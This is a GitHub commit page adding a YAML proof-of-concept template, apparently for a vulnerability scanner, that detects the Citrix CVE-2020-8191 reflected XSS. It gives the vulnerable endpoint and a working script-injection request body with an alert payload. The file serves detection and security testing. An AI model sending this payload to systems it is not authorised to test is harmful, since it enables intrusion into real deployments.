Skip to content

Commit a873989

Browse files
authored
Create citrix-cve-2020-8191-xss.yml (#797)
1 parent dd6f490 commit a873989

File tree

1 file changed

+18
-0
lines changed

1 file changed

+18
-0
lines changed

pocs/citrix-cve-2020-8191-xss.yml

+18
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
name: poc-yaml-citrix-cve-2020-8191-xss
2+
set:
3+
r1: randomLowercase(6)
4+
rules:
5+
- method: POST
6+
path: /menu/stapp
7+
headers:
8+
Content-Type: application/x-www-form-urlencoded
9+
body: >-
10+
sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
11+
follow_redirects: true
12+
expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>"))
13+
detail:
14+
author: JingLing(https://hackfun.org/)
15+
links:
16+
- https://support.citrix.com/article/CTX276688
17+
- https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
18+
- https://dmaasland.github.io/posts/citrix.html

0 commit comments

Comments
 (0)